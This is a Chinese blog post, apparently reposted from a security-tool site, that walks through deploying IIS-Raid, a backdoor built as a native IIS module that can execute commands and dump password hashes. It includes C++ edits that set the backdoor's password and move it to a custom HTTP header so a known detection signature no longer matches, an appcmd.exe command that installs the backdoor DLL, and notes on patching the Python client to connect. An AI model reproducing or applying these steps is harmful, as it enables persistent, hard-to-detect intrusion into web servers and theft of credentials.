首页 安全工具 正文

IIS Raid:使用本地模块构建的IIS后门

0×00 简介之前刷TW的时候在墙外看到老外分享的这款使用IIS的本地模块构建IIS后门,功能可以自定义命令执行,dumhash等。感觉不错。于是下了下来试了下,测试有一点小瑕疵,随即修改了下,原版项目地址(https://github.com/0x09AL/IIS-Raid)。0×01 安装和部署自定义密码字段在使用之前你得修改默认密码,已放置别人蹭你后门

0×00 简介

之前刷TW的时候在墙外看到老外分享的这款使用IIS的本地模块构建IIS后门,功能可以自定义命令执行,dumhash等。感觉不错。于是下了下来试了下,测试有一点小瑕疵,随即修改了下,原版项目地址(https://github.com/0x09AL/IIS-Raid)。

0×01 安装和部署

自定义密码字段

在使用之前你得修改默认密码,已放置别人蹭你后门。代码在/module/Functions.h中定义,如下:

// Communication Header for the Response.#define COM_HEADER "X-Chrome-Variations"#define PASS_FILE "C:\\windows\\Temp\\creds.db"#define PASSWORD "SIMPLEPASS"

SIMPLEPASS 就是自定义的密码值,连接后门的时候在HttpHeader中定义,但是这里原版的定义密码的HTTP头字段始终是一个值(X-Password)。这无疑是一个典型的特征了,所以这里得实现自定义这个字段值,在以上定义代码中添加一个常量COM_PASSWD,如下代码:

// Communication Header for the Response.#define COM_HEADER "X-Chrome-Variations"#define COM_PASSWD "X-CT-BALA"#define PASS_FILE "C:\\Windows\\Temp\\creds.db"#define PASSWORD "SIMPLEPASS"

然后再更改/module/HttpFactory.cpp39行代码替换掉X-Password值为自定义的常量,如下代码:

// Check the header password
    USHORT uPLen = 0;
    LPCSTR lpPassword = pHttpRequest->GetHeader(COM_PASSWD, &uPLen);    if (lpPassword == NULL) {        return RQ_NOTIFICATION_CONTINUE;
    }    else if (strcmp(PASSWORD, lpPassword) != 0) {        return RQ_NOTIFICATION_CONTINUE;
    }

安装

安装比较简单,可以直接在命令行下使用appcmd.exe命令安装,命令如下:

C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module Name /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true

安装成功后入下图所示:

IIS Raid:使用本地模块构建的IIS后门 后门 IISRaid 安全工具 安全工具  第1张

0×02 使用

客户端是py写的一个脚本,但貌似编码有点问题,运行时候回报错,需要去掉py脚本里的banner字符串就可以正常了。如果自定义了密码字段名还需要修改下脚本以便支持自定义HTTP头字段。如下图:

添加个–headpass的命令行参数

IIS Raid:使用本地模块构建的IIS后门 后门 IISRaid 安全工具 安全工具  第2张

把自定义的HTT头字段名加入到HttpHeader中

IIS Raid:使用本地模块构建的IIS后门 后门 IISRaid 安全工具 安全工具  第3张

连接成功入后如下图所示:

IIS Raid:使用本地模块构建的IIS后门 后门 IISRaid 安全工具 安全工具  第4张

0×03 参考

原文 https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/

演示 https://youtu.be/jbxEWOXecuU

*本文作者:Ca3tie1

海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1765.html

相关推荐

hostscan - 自动化Host碰撞工具

hostscan - 自动化Host碰撞工具

自动化Host碰撞工具,帮助红队快速扩展网络边界,获取更多目标点。0x01 前言很多时候,访问目标网站时,使用其真实IP无法访问,只有域...

安全工具 2022-08-21 0 10191

信息收集自动化工具 -- 水泽

信息收集自动化工具 -- 水泽

一、功能介绍一条龙服务,只需要输入根域名即可全方位收集相关资产,并检测漏洞。也可以输入多个域名、C段IP等,具体案例见下文。二、安装及使...

安全工具 2022-04-24 0 10618

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持